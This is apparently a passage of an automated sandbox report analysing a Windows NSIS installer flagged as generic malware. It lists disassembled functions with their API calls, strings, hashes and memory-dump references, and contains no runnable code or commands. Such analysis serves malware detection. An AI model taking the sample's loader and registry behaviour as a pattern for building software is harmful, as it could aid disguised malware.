                                                                        • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                                        • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                                        • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 6EAC17C3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17CC
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17DA
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6EAC17F9
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6EAC1822
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                        • String ID: IsWow64Process2$KERNEL32
                                                                        • API String ID: 977827838-1019154776
                                                                        • Opcode ID: dc7d2f6f335aecdbd4301cffdcb45171354d2bc1e1d87e93df7588b8cf649f67
                                                                        • Instruction ID: 623ec8d0a9d1461445b8d07cec45f7e86c6e6eae0b63de795314dc8983b88943
                                                                        • Opcode Fuzzy Hash: dc7d2f6f335aecdbd4301cffdcb45171354d2bc1e1d87e93df7588b8cf649f67
                                                                        • Instruction Fuzzy Hash: 1B015272E0060AAAEF01EBE4CC49ABF7B7CDF05640F4480A1A911E7040EB74DD4AC775
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404C27 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C42
                                                                        • GetMessagePos.USER32 ref: 00404C4A
                                                                        • ScreenToClient.USER32(?,?), ref: 00404C64
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C76
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                        • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                                        • MulDiv.KERNEL32(0008927E,00000064,?), ref: 00402E6B
                                                                        • wsprintfA.USER32 ref: 00402E7B
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402E75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                        • Instruction ID: 3badc6b09a90e5cd1525348ef4ea74cecb255546bda3c46a06932aa9f71b5be3
                                                                        • Opcode Fuzzy Hash: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                        • Instruction Fuzzy Hash: 61016270640209FBEF209F60DE09EEE3769EB04344F008039FA06B51D0DBB89955CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404B1D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(Drivelingly Setup: Installing,Drivelingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                        • wsprintfA.USER32 ref: 00404BC3
                                                                        • SetDlgItemTextA.USER32(?,Drivelingly Setup: Installing), ref: 00404BD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$Drivelingly Setup: Installing
                                                                        • API String ID: 3540041739-3306535467
                                                                        • Opcode ID: f9a1414fa03c0c3c7f8caedbf18c99db995dc974198a74691eea8222610f4172
                                                                        • Instruction ID: b26deece5e1670680048ef5420f4dfbdf719bfc276585dbcb3e162ecceacc2fc
                                                                        • Opcode Fuzzy Hash: f9a1414fa03c0c3c7f8caedbf18c99db995dc974198a74691eea8222610f4172
                                                                        • Instruction Fuzzy Hash: 8311B773A0412867DB00756D9C41FAF3698DB85374F25027BFA26F31D1E979DC1282AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402D3B Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D8F
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE4
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E06
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: bcf30ede795412a278e614d35869279e6b92a28af07cf09550cc0822dd29a43e
                                                                        • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                                        • Opcode Fuzzy Hash: bcf30ede795412a278e614d35869279e6b92a28af07cf09550cc0822dd29a43e
                                                                        • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                        • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                        • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                        • Instruction ID: 4973ce5daa8367ce9871db5c73950c0598185a6d8b35e77b8380d9c424f967d4
                                                                        • Opcode Fuzzy Hash: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                        • Instruction Fuzzy Hash: E3213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A0DB789941DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 6EAC183D Relevance: 7.5, APIs: 5, Instructions: 45windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,00000002,00000000,774E2D70,?,?,?,?,6EAC147C,00000002,?), ref: 6EAC185A
                                                                        • OemToCharBuffA.USER32(?,?,00000000), ref: 6EAC1863
                                                                        • SendMessageA.USER32(00001004,00000000,00000000,00000002), ref: 6EAC187C
                                                                        • SendMessageA.USER32(00001007,00000000,?), ref: 6EAC18A1
                                                                        • SendMessageA.USER32(00001013,?,00000000), ref: 6EAC18B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2682914888-0
                                                                        • Opcode ID: 509b76061d157da8216bb5b800e007bc7e5fb8ddc104aa1f4244788c40bbaf22
                                                                        • Instruction ID: 087f947681cf6d8f1f6781e7fff8b228e22e837af5a254ca3b6b505ef4ca4a14
                                                                        • Opcode Fuzzy Hash: 509b76061d157da8216bb5b800e007bc7e5fb8ddc104aa1f4244788c40bbaf22
                                                                        • Instruction Fuzzy Hash: 3B011A71900608AADF129FA6CD88CEABABCFB8EB55F118156E641B6140C6719D49CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401E35 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                        • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 7f4e46d46451b2de0eb6c05362a6388cf206f8a272ad05d839840d7a4d7908df
                                                                        • Instruction ID: 7d8b70fc9580f7c0a3656fe434d2777149f8876c9caaa3587920b0b4353cf884
                                                                        • Opcode Fuzzy Hash: 7f4e46d46451b2de0eb6c05362a6388cf206f8a272ad05d839840d7a4d7908df
                                                                        • Instruction Fuzzy Hash: 04019E72504240AFE7007BB0AF4AA9A7FF8EB55305F10847DF281B61F2CB7804888B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405BE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BEF
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BF8
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C09
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-2145255484
                                                                        • Opcode ID: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                        • Instruction ID: 3e3e415651ec8bc6573efeb1b95b99caa1af1f852236f091574545f75c3ac81b
                                                                        • Opcode Fuzzy Hash: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                        • Instruction Fuzzy Hash: 15D02362609634BBE20137154D05EDF194C8F0335070504BBF100B31A1C77C4C1147FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402EBB
                                                                        • GetTickCount.KERNEL32 ref: 00402ED9
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                                        • ShowWindow.USER32(00000000,00000005,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F04
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                        • Instruction ID: d6c9869078f7173a9f6fd6f2732e3e3a433b8c8c07e8cf938b477ca654505681
                                                                        • Opcode Fuzzy Hash: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                        • Instruction Fuzzy Hash: 30F05E30645620ABC6317BA0FE8C99B7B64A704B12BA1043AF101F22E4CA7408878BED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405CD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405C90
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405D2A
                                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-2145255484
                                                                        • Opcode ID: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                        • Instruction ID: 961b8afdf15cf8a693d93a37420b81600cf3221e3748574004b2986df105c153
                                                                        • Opcode Fuzzy Hash: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                        • Instruction Fuzzy Hash: 01F02D25108E6526E62632391D09AAF0645CD93324759453FFCA2762C1DB3C89439E6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004052EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0040531B
                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                                          • Part of subcall function 00404320: SendMessageA.USER32(0001047E,00000000,00000000,00000000), ref: 00404332
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
